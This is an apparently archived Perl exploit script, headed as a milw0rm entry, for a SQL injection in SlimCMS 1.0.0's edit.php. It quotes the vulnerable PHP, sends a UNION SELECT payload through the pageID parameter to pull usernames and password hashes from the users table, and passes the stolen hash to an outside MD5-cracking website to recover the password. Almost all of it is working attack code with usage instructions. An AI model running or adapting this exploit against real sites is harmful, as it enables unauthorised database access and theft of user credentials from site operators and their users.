#!/usr/bin/perl

=starting

 --------------------------------------------------------
 SlimCMS <= 1.0.0 (edit.php) Remote SQL Injection Exploit
 --------------------------------------------------------
 by athos - staker[at]hotmail[dot]it
 
 download on sourceforge 
 
 
 File edit.php
 
 111. if ($password == md5($_POST['password']))
 112. {
 113.    if (strlen($_POST['cmsText']) > 2) {
 114. $query  = "UPDATE pages SET title = '".$_POST['pageTitle']."', content =  '".
      strip_tags(stripslashes($_POST['cmsText']),$allowedTags)."' WHERE ID = ".$_GET['pageID'];
 115. mysql_query($query);
 116. //$successfulyUpdated
 117. responseText = $successfulyUpdated;
 118. }
 119.
 120. if (strlen($_GET['pageID']) > 0) {
 121. $query  = "SELECT * FROM pages WHERE ID = ".$_GET['pageID'];
 122. $result = mysql_query($query);
 123.
 124.				
 125. while($row = mysql_fetch_array($result)) {
 126.	$pageTitle = $row['title'];
 127.	$pageContent = $row['content'];
 128.  }
 129. }
 
 NOTE: Works Regardless PHP.ini Settings!
 
  
  you must be logged..
  
  Usage: perl "exploit.pl" [HOST] [username:password] [USER_ID]
  
  Output: Username: athos
          Password: 27e43424d53719a645ae7cca038b45be
 
 

=cut

use strict;
use LWP::UserAgent;
use LWP::Simple;

my $match = q{Editing page "(.+?)"};
my $http = new LWP::UserAgent; 
my $post = undef;
my @login = ();
my @out = ();

my ($host,$auth,$myid) = @ARGV;

unless($host =~ /http:\/\/(.+?)$/i && $auth && $myid)
{
    print STDOUT "Usage: perl $0 [host/path] [username:password] [id]\r\n"; 
    exit;
} 

$host .= "/edit.php?pageID=-1 union select 1,concat(username,0x3a,password),3,4 from users where id=$myid#";

@login = split(':',$auth);

$post = $http->post($host,[ 
                            username => $login[0],
                            password => $login[1],
                         ]);


if($post->is_success && $post->content =~ $match) 
{
    @out = split(':',$1);
   
    if($#out => 2)
    {
        my $cracked = search_MD5($out[1]);
        
        print STDOUT "Username: $out[0]\r\n";
        print STDOUT "Password: $out[1] -> $cracked\r\n";
        exit;  
   }
   else
   {
       print STDOUT "Exploit Failed!\r\n";
       print STDOUT "Login incorrect or site not vulnerable\\available!\r\n";
       exit;
   }
}


sub search_MD5
{
    my $hash = shift @_;
    my $cont = undef;

    $cont = get('http://md5.rednoize.com/?p&s=md5&q='.$hash);
        
    if(length($hash) => 32 && !is_error($cont))
    {
        return $cont;
    }
    else
    {
        return exit;
    }
}   
    
__END__

# milw0rm.com [2008-11-14]
